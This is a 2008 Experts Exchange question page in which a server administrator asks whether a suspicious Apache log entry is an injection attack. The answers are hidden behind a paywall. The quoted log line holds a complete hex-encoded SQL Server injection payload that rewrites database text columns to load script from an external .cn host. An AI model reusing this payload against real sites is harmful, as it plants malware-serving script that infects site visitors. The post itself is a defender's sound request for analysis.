Advertisement

08.24.2008 at 02:37AM PDT, ID: 23673445
[x]
Attachment Details
[x]
The Solution Rating System

With so many solutions, how can you tell which solutions are most likely to help you and which ones are not? To provide you with a tool to use, we rate our solutions based on various elements that most accurately determine if a solution is a quality solution. To explain what factors affect the solution rating, here are the elements we take into consideration when formulating our solution rating.

  • The Grade of the Solution
  • The Zone Rank of the Expert Providing the Solution
  • The Number of Author and Expert Comments
  • The Number of Experts Contributing
  • The Feedback of the Community

Your Input Matters
Because of the way the system is set up, the most important variable in this equation is you. As a member of Experts Exchange, you are able to cast your vote on the quality of the solutions in regard to how complete, accurate, helpful and easy to understand each solution is. When you provide your feedback, each rating is adjusted accordingly. So, if you see a solution that has a poor rating that you think is a good solution, let us know by rating it. As you do, the rating will be adjusted and will become more accurate for other members of our site.

If you have any suggestions that you would like to make for our rating system, please ask a question in the Suggestions Zone of Community Support.

Thank you!
8.5

Is this an attempt at SQL/Javascript injection attack on Apache

Asked by grahamnonweiler in Apache Web Server, Networking Security Vulnerabilities

Tags: , , , ,

Starting 3 days ago I have begun seeing an entry in the Apache access logs on a couple of our production servers (we have over 70). These are not consistent in origin, and also not consistent in their destination (meaning we host many clients' websites on different servers in different physical locations).

The extract looks like embedded Javascript - although it could be an attempt at a .NET injection.

==== Log Extract ====


NN.NNN.59.132 - - [24/Aug/2008:00:00:23 +0000] "GET /thsite_nshw.php
?mwi=319;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204
054207661726368617228323535292C4043207661726368617228343030302920444
5434C415245205461626C655F437572736F7220435552534F5220464F522073656C6
5637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473206
12C737973636F6C756D6E73206220776865726520612E69643D622E696420616E642
0612E78747970653D27752720616E642028622E78747970653D3939206F7220622E7
8747970653D3335206F7220622E78747970653D323331206F7220622E78747970653
D31363729204F50454E205461626C655F437572736F72204645544348204E4558542
046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494
C4528404046455443485F5354415455533D302920424547494E20657865632827757
064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7
469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F756
8756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2
7272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B65202
72725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777
777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F736372697
0743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F4
37572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20
CHAR(4000));EXEC(@S); HTTP/1.1" 200 24680 "-" "Mozilla/4.0 (compati
ble; MSIE 7.0; Windows NT 5.1)" "VisitorID=212919310816014230"

======== END of EXTRACT =======

I have split the actual log line (obviously) here and also removed the origination IP address (which isn't relevant as it not consistent).

The only part of the URI that is valid is the script name and the passed variable "mwi" and its numeric value. The remainder of the URI is what I believe to be the injection attack.

If anyone here has seen/experienced similar entries in their log files I would be interested to hear what your findings were, and similarly if anyone knows what it is that would be even better!Start Free Trial
[+][-]08.24.2008 at 03:19AM PDT, ID: 22300097

Assisted solutions are selected by the member who asked the question as a comment that contributed to their question's solution.

Start your 30-day free trial to view this Assisted Solution or ask the Experts your question.

 
[+][-]08.24.2008 at 05:39AM PDT, ID: 22300326

View this solution now by starting your 30-day free trial. Setting up your free trial is quick, easy, and secure. We will return you to this solution, unlocked, when you're done.

 

About this solution

Zones: Apache Web Server, Networking Security Vulnerabilities
Tags: Apache, HTTP, 2.2, Multiple production servers, SQL or Javascript Injection Attack
Sign Up Now!
Solution Provided By: jahboite
Participating Experts: 4
Solution Grade: A
 
 
[+][-]08.24.2008 at 06:24AM PDT, ID: 22300469

At Experts Exchange, members can ask their questions to thousands of technology professionals, also known as Experts. Experts compete and collaborate to answer those questions by leaving comments like this one.

Start your 30-day free trial to view this Expert Comment or ask the Experts your question.

 
[+][-]08.24.2008 at 12:51PM PDT, ID: 22301845

Often, when Experts are collaborating with members who have asked questions, they will request additional information about the problem. Askers respond with an author comment like this one.

Start your 30-day free trial to view this Author Comment or ask the Experts your question.

 
[+][-]08.26.2008 at 12:27PM PDT, ID: 22318448

At Experts Exchange, members can ask their questions to thousands of technology professionals, also known as Experts. Experts compete and collaborate to answer those questions by leaving comments like this one.

Start your 30-day free trial to view this Expert Comment or ask the Experts your question.

 
[+][-]08.26.2008 at 02:24PM PDT, ID: 22319713

Often, when Experts are collaborating with members who have asked questions, they will request additional information about the problem. Askers respond with an author comment like this one.

Start your 30-day free trial to view this Author Comment or ask the Experts your question.

 
 
Loading Advertisement...
20081112-EE-VQP-44 / EE_QW_2_20070628